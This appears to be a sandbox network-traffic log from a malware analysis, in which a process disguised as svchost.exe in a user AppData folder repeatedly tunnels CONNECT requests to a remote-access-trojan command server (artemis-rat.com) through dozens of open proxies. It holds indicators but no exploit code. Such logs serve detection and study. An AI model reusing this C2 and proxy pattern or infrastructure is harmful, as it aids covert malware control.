                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3562192.168.2.561353104.25.115.1258043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.161883116 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.316960096 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:37 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3563192.168.2.561290134.209.189.428043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.164674044 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.457410097 CET327INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                    Date: Sat, 09 Mar 2024 12:14:37 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 166
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3564192.168.2.56127345.120.178.197108043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.167849064 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3565192.168.2.561270181.212.136.34519943220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.170228958 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.973823071 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3566192.168.2.557563176.58.103.55312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.170377970 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3567192.168.2.557721148.72.206.84253643220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.176824093 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3568192.168.2.561245190.128.228.1828043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.178103924 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.539026976 CET1286INHTTP/1.1 200 OK
                                                                                    Date: Sat, 09 Mar 2024 12:14:37 GMT
                                                                                    Server: Apache/2.4.56 (Ubuntu)
                                                                                    Set-Cookie: PHPSESSID=5vviiqd350dck1iuikbgirduku; path=/
                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                    Pragma: no-cache
                                                                                    Vary: Accept-Encoding
                                                                                    Content-Length: 5101
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 65 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 73 74 61 74 69 63 2f 73 72 63 2f 69 6d 67 2f 66 75 74 75 72 61 2e 70 6e 67 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 55 54 55 52 41 31 30 30 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 0d 0a 3c 21 2d 2d 20 46 6f 6e 74 66 61 63 65 73 20 43 53 53 2d 2d 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 63 73 73 2f 66 6f 6e 74 2d 66 61 63 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 63 6f 64 69 67 6f 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2d 35 2f 63 73 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 61 6c 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 0d 0a 3c 21 2d 2d 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 63 6f 64 69 67 6f 73 2f 6d 64 69 2d 66 6f 6e 74 2f 63 73 73 2f 6d 61 74 65 72 69 61 6c 2d 64 65 73 69 67 6e 2d 69 63 6f 6e 69 63 2d 66 6f 6e 74 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 2d 2d 3e 0d 0a 0d 0a 3c 21 2d 2d 20 42 6f 6f 74 73 74 72 61 70 20 43 53 53 2d 2d 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 73 74 61 74 69 63 2f 6c 69 62 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6f 6f 74 73 74 72 61 70 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 0d 0a 0d 0a 3c 21 2d 2d 20 63 6f 64 69 67 6f 73 20 43 53 53 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 63 6f 64 69 67 6f 73 2f 61 6e 69 6d 73 69 74 69 6f 6e 2f 61 6e 69 6d 73 69 74 69 6f 6e 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 63 6f 64 69 67 6f 73 2f 70 65 72 66 65 63 74 2d 73 63 72 6f 6c 6c 62 61 72 2f 70 65 72 66 65 63 74 2d 73 63 72 6f 6c 6c 62 61 72 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 2d 2d 3e 0d 0a 0d 0a 3c 21 2d 2d
                                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta http-equiv="X-UA-Compatible" content="ie=edge"> <link rel="icon" href="static/src/img/futura.png"> <title>FUTURA100</title><link href="css/style.css" rel="stylesheet" media="all">... Fontfaces CSS--><link href="css/font-face.css" rel="stylesheet" media="all"><link href="codigos/font-awesome-5/css/fontawesome-all.min.css" rel="stylesheet" media="all">...<link href="codigos/mdi-font/css/material-design-iconic-font.min.css" rel="stylesheet" media="all">-->... Bootstrap CSS--><link href="static/lib/css/bootstrap/bootstrap.css" rel="stylesheet" media="all">... codigos CSS<link href="codigos/animsition/animsition.min.css" rel="stylesheet" media="all"><link href="codigos/perfect-scrollbar/perfect-scrollbar.css" rel="stylesheet" media="all">-->...
                                                                                    Mar 9, 2024 13:14:37.539043903 CET1286INData Raw: 20 4d 61 69 6e 20 43 53 53 2d 2d 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2d 74 6f 75 72 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22
                                                                                    Data Ascii: Main CSS--><link href="css/bootstrap-tour.min.css" rel="stylesheet" media="all"><link href="css/bootstrap-tour-standalone.css" rel="stylesheet" media="all"><link href="css/theme.css" rel="stylesheet" media="all"><link rel="stylesh
                                                                                    Mar 9, 2024 13:14:37.539136887 CET1286INData Raw: 74 72 61 70 2d 74 6f 75 72 2d 30 2e 31 32 2e 30 2f 72 65 74 69 6e 61 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63
                                                                                    Data Ascii: trap-tour-0.12.0/retina.min.js"></script><script src="https://cdnjs.cloudflare.com/ajax/libs/xlsx/0.18.5/xlsx.full.min.js" integrity="sha512-r22gChDnGvBylk90+2e/ycr3RVrDi8DIOkIGNhJlKfuyQM4tIRAI062MaV8sfjQKYVGjOBaZBOA87z+IhZE9DA==" crossorigi
                                                                                    Mar 9, 2024 13:14:37.539211988 CET1286INData Raw: 69 c3 b3 6e 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e
                                                                                    Data Ascii: in</button> </div> </div> </div> </div> <div class="p-3 d-flex justify-content-center mt-5" style="background-color: rgba(0, 0, 0, -0.9);width: 400px; margin-left:auto;margin-r
                                                                                    Mar 9, 2024 13:14:37.539277077 CET298INData Raw: 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 73 74 61 74 69 63 2f 73 72 63 2f 6a 73 2f 6d 61 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 73 74 61 74 69 63 2f 73 72 63 2f 6a 73 2f 6c 6f 67 69
                                                                                    Data Ascii: <script src="static/src/js/main.js"></script> <script src="static/src/js/login.js"></script> <script src="static/lib/js/bootstrap-tour-0.12.0/bootstrap-tour.min.js"></script> <script src="static/lib/js/bootstrap-tour-0.12.0/bootst
                                                                                    Mar 9, 2024 13:14:37.576431990 CET177OUTData Raw: 16 03 03 00 ac 01 00 00 a8 03 03 65 ec 52 ac 24 66 dd f1 b9 a7 82 8c ee 8f 4e 71 84 fd e6 d8 b6 4e 56 53 3a f7 70 c2 94 c9 1d f8 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                                    Data Ascii: eR$fNqNVS:p*,+0/$#('=<5/Uartemis-rat.com#
                                                                                    Mar 9, 2024 13:14:37.934115887 CET494INHTTP/1.1 400 Bad Request
                                                                                    Date: Sat, 09 Mar 2024 12:14:37 GMT
                                                                                    Server: Apache/2.4.56 (Ubuntu)
                                                                                    Content-Length: 312
                                                                                    Connection: close
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 67 72 2e 66 75 74 75 72 61 31 30 30 2e 63 6f 6d 2e 70 79 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.56 (Ubuntu) Server at agr.futura100.com.py Port 80</address></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3569192.168.2.56091945.11.95.165521943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.179649115 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3570192.168.2.55758645.11.95.166601443312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.182183027 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3571192.168.2.56129551.75.126.1503563243220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.185024023 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3572192.168.2.561347107.181.161.81414543220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.186780930 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3573192.168.2.561271103.23.100.1414543220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.186935902 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3574192.168.2.557403103.148.51.19808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.193167925 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3575192.168.2.561361172.67.182.1508043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.196062088 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.350497961 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:37 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3576192.168.2.56146036.94.2.13844343220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.198401928 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3577192.168.2.560085181.78.79.6399943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.198687077 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3578192.168.2.559988103.118.44.156808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.199323893 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3579192.168.2.56146536.94.2.13844343220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.199553013 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3580192.168.2.56146836.94.2.13844343220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.203699112 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3581192.168.2.561275103.42.57.13312843220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.206895113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:38.216887951 CET39INHTTP/1.1 200 Connection established


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3582192.168.2.56104436.134.91.82888843220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.233306885 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:38.333554983 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3583192.168.2.560979199.58.184.97414543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.234266996 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3584192.168.2.56120190.188.250.168043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.235131025 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:38.145977974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
